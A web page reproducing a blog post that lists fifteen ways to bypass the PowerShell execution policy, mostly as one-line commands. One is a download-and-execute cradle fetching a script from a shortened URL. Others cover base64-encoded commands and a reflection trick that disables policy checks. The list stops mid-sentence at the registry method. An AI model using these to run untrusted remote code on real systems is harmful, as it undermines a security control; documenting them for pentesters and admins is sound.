Skip to main content

Bypass the PowerShell Execution Policy

15 Ways to Bypass the PowerShell Execution Policy

Author: Scott Sutherland

Original Article: NetSPI Blog

Introduction

By default, PowerShell is configured to prevent the execution of scripts on Windows systems. This can pose challenges for penetration testers, system administrators, and developers. However, there are multiple methods to bypass these restrictions without requiring local administrator rights.

1. Paste the Script into an Interactive PowerShell Console

Simply copy and paste your PowerShell script directly into an interactive console. This method doesn't require writing to disk or changing configurations.

2. Echo the Script and Pipe it to PowerShell Standard Input

Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -

3. Read Script from a File and Pipe to PowerShell Standard Input

Get-Content .\runme.ps1 | PowerShell.exe -noprofile -
TYPE .\runme.ps1 | PowerShell.exe -noprofile -

4. Download Script from URL and Execute with Invoke Expression

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')"

5. Use the Command Switch

PowerShell -command "Write-Host 'My voice is my passport, verify me.'"

6. Use the EncodeCommand Switch

$command = "Write-Host 'My voice is my passport, verify me.'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -EncodedCommand $encodedCommand

7. Use the Invoke-Command Command

Invoke-Command -ScriptBlock {Write-Host "My voice is my passport, verify me."}

8. Use the Invoke-Expression Command

Get-Content .\runme.ps1 | Invoke-Expression

9. Use the “Bypass” Execution Policy Flag

PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1

10. Use the “Unrestricted” Execution Policy Flag

PowerShell.exe -ExecutionPolicy UnRestricted -File .\runme.ps1

11. Use the “Remote-Signed” Execution Policy Flag

PowerShell.exe -ExecutionPolicy RemoteSigned -File .\runme.ps1

12. Disable ExecutionPolicy by Swapping out the AuthorizationManager

function Disable-ExecutionPolicy {
  ($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue($executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))
}
Disable-ExecutionPolicy
.\runme.ps1

13. Set the ExecutionPolicy for the Process Scope

Set-ExecutionPolicy Bypass -Scope Process

14. Set the ExecutionPolicy for the CurrentUser Scope via Command

Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

15. Set the ExecutionPolicy for the CurrentUser Scope via the Registry

Modify the registry key:

HKEY_CURRENT_USER\Softw
Back to top